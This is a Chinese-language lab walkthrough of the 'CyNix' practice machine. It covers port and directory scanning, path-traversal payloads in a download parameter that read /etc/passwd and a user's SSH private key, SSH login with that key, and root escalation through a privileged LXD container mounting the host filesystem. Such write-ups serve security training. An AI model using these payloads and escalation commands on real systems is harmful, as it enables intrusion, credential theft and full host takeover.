CyNix

一、主机发现和端口扫描

主机发现，靶机地址192.168.80.146
```
arp-scan -l
```
端口扫描，只开放了80和6688端口
```
nmap -A -p- -sV 192.168.80.146
```

二、信息收集

访问80端口

路径扫描

gobuster dir -u http://192.168.80.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50

在这里插入图片描述

访问/lavalamp

扫描/lavalamp路径

gobuster dir -u http://192.168.80.146/lavalamp/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50

在这里插入图片描述

访问head.php

三、漏洞发现

访问head.php页面，查看源码发现一段备注是的JS代码

function lhook(id) {
       var e = document.getElementById(id);
       if(e.style.display == 'block')
          e.style.display = 'none';
       else
          e.style.display = 'block';
    }

lhook函数接受一个元素ID作为参数。它使用document.getElementById获取元素，并将其存储在变量e中。如果元素的display样式当前设置为'block'，则函数将其更改为'none'。否则，它将显示样式更改为'block'。这在调用函数时切换元素的可见性

好像也没啥用，有返回到主页面，有个提交的表单，提交一下发现了新大陆
直接访问/lavalamp/canyoubypassme.php，发现和之前的一样，但是查看源码时发现，它的body标签有内容，而且里面存在猫腻，发现有个透明度被设置为0（opacity: 0.0）的table标签，随即将其修改为opacity: 1.0
发现是一个文件下载的功能，抓包看一下

四、漏洞利用

经过不断尝试，发现read参数不影响结果，但是file参数存在路径穿越和任意文件读取

/test/../../../../etc/passwd
;../../../etc/passwd
AAAAAAAAAAAA../../../etc/passwd
%252e%252e%252f../../../etc/passwd
%250C../../../etc/passwd
%25A0../../../etc/passwd

在这里插入图片描述

在文件中发现一个ford用户，尝试访问它的私钥文件

/test/../../../../home/ford/.ssh/id_rsa

在这里插入图片描述

复制私钥到kali，ssh访问

chmod 600 id_rsa 
ssh ford@192.168.80.146 -p 6688 -i id_rsa

在这里插入图片描述

五、权限提升

lxd提权，首先在kali上生成镜像

git clone https://githubfast.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

在这里插入图片描述

完成上面操作之后会在当前目录下生成一个tar.gz镜像文件，然后把这个文件发送到目标服务器上，需要把镜像挂载到lxd中，然后检查一下当前可用容器，配置完成之后进入容器，定位到/mnt/root即可查看目标主机设备的所有资源。运行了Bash之后，得到一个容器的shell。这个容器中包含了目标主机的全部资源，拥有该靶机的root权限，成功通过LXD提权
```
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```
结束